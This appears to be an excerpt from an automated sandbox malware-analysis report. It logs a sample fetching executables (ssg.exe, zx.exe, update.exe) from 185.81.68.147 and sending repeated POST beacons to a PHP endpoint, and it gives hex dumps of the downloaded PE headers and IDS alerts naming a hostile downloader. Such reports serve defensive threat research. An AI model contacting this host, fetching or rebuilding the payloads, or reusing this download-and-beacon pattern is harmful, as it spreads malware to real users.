                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Dec 2024 17:42:49 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Dec 2024 17:42:52 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 08:15:56 GMTETag: "5a4530-6294aac656b58"Accept-Ranges: bytesContent-Length: 5915952Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 3c 90 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 c5 45 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 16 Dec 2024 17:43:03 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 10:31:58 GMTETag: "4ba00-6294c92dae555"Accept-Ranges: bytesContent-Length: 309760Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 db af 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 14 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 72 00 00 28 00 00 00 00 a0 00 00 28 03 00 00 00 90 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 13 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 23 00 00 00 50 00 00 00 24 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 4c 02 00 00 00 90 00 00 00 04 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 a0 00 00 00 04 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 50 04 00 00 b0 00 00 00 50 04 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                    Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
                    Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49717 -> 185.81.68.147:80
                    Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.10:49723 -> 185.81.68.147:80
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 33
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                    Source: global trafficHTTP traffic detected: POST /VzCAHn.php?443320E440F81953448019 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
